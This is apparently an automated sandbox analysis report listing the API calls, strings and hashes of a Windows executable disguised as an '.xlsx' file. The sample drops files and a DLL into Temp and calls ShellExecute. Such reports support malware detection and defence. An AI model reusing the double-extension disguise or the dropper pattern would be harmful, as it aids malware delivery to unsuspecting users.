                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                          APIs
                                                          • SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                          • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                          • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,?), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,?), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                          • API String ID: 2246997448-2325876253
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,?), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,?), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: Call$N$open
                                                          • API String ID: 3615053054-2563687911
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3897275176
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp$C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
                                                          • API String ID: 1453599865-2185136702
                                                          • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          APIs
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                            • Part of subcall function 00403062: SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                            • Part of subcall function 00403062: WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                          • String ID:
                                                          • API String ID: 64603807-0
                                                          • Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
                                                          • Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
